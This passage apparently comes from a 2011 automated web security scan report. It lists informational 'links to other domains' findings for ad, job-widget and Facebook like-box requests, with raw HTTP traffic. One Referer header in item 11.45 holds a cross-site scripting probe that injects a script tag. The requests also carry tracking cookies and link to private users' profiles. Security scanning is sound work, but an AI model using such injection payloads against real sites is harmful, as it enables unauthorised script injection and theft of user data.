Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 12 Sep 2011 12:40:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 4781


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<img src="http://al1.sharethis.com/impr?campaign=adx-impr" alt=""/>
       <img src="http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A" alt=""/>                <script type="text/javascript">
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>

           <img src="http://pixel.rubiconproject.com/tap.php?v=6432&rnd1315831255" alt="" width="1" height="1" />

           <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544462&t=2&rnd1315831255" alt=""/>


           <script type="text/javascript">
...[SNIP]...
11.43. http://syndication.jobthread.com/jt/syndication/page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.jobthread.com
Path:   /jt/syndication/page.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.popsci.com&num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:13 GMT
Server: Apache/2
Vary: Host
Content-Length: 1964
Connection: close
Content-Type: application/x-javascript


   document.write('<div class="content"><div style="background:url(\'http://static.jobthread.com/files/site_images/727999/727999_popsci-jobs-widget.png\') no-repeat 0 0;height:24px;width:340px;"></div><div style="margin:5px;"> <a href="http://jobs.popsci.com/job/software-test-engineer-sdet-ii-macintosh-business-redmond-wa-microsoft-eab8e9e1c4/?d=1&amp;source=jobroll">Software Test Engineer (SDET) II-Maci...</a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/mobile-developers-and-more-kik-waterloo-on-canada-kik-interactive-inc-7474aa5ec0/?d=1&amp;source=jobroll">Mobile Developers and More @Kik </a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/senior-software-development-engineer-sde-issaquah-wa-microsoft-2e4880a8e2/?d=1&amp;source=jobroll">Senior Software Development Engineer ...</a>
...[SNIP]...
<div style="float:left;clear:none;width:150px;margin-top:5px;"><a href="http://jobs.popsci.com/">More Jobs</a>&nbsp;|&nbsp;<a href="http://jobs.popsci.com/post">Post a Job</a>
...[SNIP]...
11.44. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/1829737

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close
Content-Length: 7028

<html><head><title>ATT_Potter_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
<noscript>
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/go/334302974/direct;ai.235624236;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/CJCNTCINGABS/05_ABS_728x90_2011/ATT_Potter_70_728x90_v2.jpg?ver=1" width="728" height="90" />
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...
11.45. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/4245069

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: AA002=1311365777-4076437; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 13:06:09 GMT
Connection: close
Content-Length: 7033

<html><head><title>ATT_NoImage_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
<noscript>
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/go/334302974/direct;ai.235623689;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/CJCNTCINGABS/05_ABS_728x90_2011/ATT_NoImage_70_728x90_v2.jpg?ver=1" width="728" height="90" />
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...
11.46. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.127.52
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:21 GMT
Content-Length: 13287

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pacokiuoficial" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275029_623408303_7363567_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.47. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.182.118
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:09 GMT
Content-Length: 13284

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273359_26311129_904709769_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pacokiuoficial" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275029_623408303_7363567_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261029_1193179193_1591267711_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.48. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=15713980389&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.173.114
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:55 GMT
Content-Length: 13110

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/mtvuk" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276473_15713980389_4949022_q.jpg" alt="MTV UK" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/harelxzxz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100000420492434_4883101_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001127569306" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274302_100001127569306_7126373_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/273514_688287219_759274808_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1428567834" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273639_1428567834_6776024_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/368701_622901920_7741892_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002926155271" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/368744_100002926155271_726971645_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002946825529" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273629_100002946825529_753202112_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275192_100000023670259_694968752_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002563202396" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273576_100002563202396_4378978_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002671470911" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275817_100002671470911_1387734045_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.49. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpopsci&width=347&colorscheme=light&show_faces=true&stream=false&header=false&height=250 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Length: 13693

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/PopSci" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276448_60342206410_3098453_q.jpg" alt="Popular Science" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/dogunmola" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49874_100000581760599_7045671_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ILuvYoshi08" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275249_1179315915_1118970385_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/cole.harland" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274860_1395846706_6830114_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/tonumalsub" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173907_531132628_1512733_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nima.agri" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273467_100002510744967_3627332_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/preetivarma" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211763_100000473693390_4514483_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/mawar.kuning.41" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186063_100000334296599_7302850_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002104474986" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273483_100002104474986_318419503_q.jpg" alt="" /><div class="name">
...[SNIP]...
